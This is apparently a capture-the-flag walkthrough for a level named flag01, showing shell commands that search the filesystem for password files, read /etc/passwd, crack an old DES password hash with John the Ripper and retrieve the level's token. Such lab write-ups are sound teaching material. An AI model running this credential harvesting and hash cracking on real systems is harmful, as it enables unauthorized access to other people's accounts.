> find / -name "*pass*" 2> /dev/null
...
...
/etc/passwd
...
...

> cat /etc/passwd
...
...
flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
...
...


copied the first part: "flag01:42hDRfypTqqnw"


> john pass.txt
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcdefg          (flag01)
1g 0:00:00:00 100% 2/3 33.33g/s 1659Kp/s 1659Kc/s 1659KC/s 123456..lucky0
Use the "--show" option to display all of the cracked passwords reliably
Session completed

password: abcdefg

> getflag
Check flag.Here is your token : f2av5il02puano7naaf6adaaf
